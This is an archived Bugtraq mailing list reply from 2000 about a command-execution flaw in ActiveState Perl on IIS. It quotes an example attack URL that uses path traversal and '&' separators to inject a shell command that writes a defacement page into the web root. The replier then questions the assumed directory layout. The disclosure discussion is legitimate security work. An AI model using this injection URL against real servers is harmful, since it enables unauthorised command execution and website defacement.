Bugtraq mailing list archives
Re: Filename Inspection+Perl can Executing commands
From: Tom Geldner <tom () XOR CC>
Date: Thu, 7 Dec 2000 21:53:22 -0800
----- Original Message -----
From: "Billy Nothern" <disk_key () HOTMAIL COM>

Here is an example URL an attacker could use:

http://host/."./."./Perl/eg/core/findtar+&+echo+hacked+>+c:\InetPub\wwwroot\hacked.html+&+.pl

The whole discussion was interesting, but speaking as a site that runs ActiveState Perl, the assumptive directory layout you've outlined doesn't seem correct. (Regardless, we don't have findtar in our Perl libs.) lib/core is what I've seen.

Is this exploit specific to a particular install or version of AS Perl for IIS?

Tom
Current thread:
- Filename Inspection+Perl can Executing commands Billy Nothern (Dec 08)
- Re: Filename Inspection+Perl can Executing commands Tom Geldner (Dec 11)